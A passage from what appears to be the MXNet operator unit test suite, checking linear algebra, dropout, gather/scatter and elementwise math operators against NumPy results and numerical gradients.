q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
@with_seed()
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as they need cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
@with_seed()
def test_laop_4():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 10):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test extraction of triangle by doing a full roundtrip as the intermediate extracted
# triangle has different orderings than numpy.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@with_seed()
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
a = np.sqrt(np.arange(4 * 4)).reshape(4, 4)
a = np.tile(a, (3, 1, 1))
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
@with_seed()
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/14288")
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure input zeroes are none (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# Hopefully should be within ratio/2 %
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
check_dropout_ratio(0.5, shape, cudnn_off=False)
check_dropout_ratio(0.0, shape, cudnn_off=False)
check_dropout_ratio(1.0, shape, cudnn_off=False)
check_dropout_ratio(0.75, shape, cudnn_off=False)
check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
check_passthrough(0.5, shape, cudnn_off=False)
check_passthrough(0.0, shape, cudnn_off=False)
check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
@with_seed()
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@with_seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
@with_seed()
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
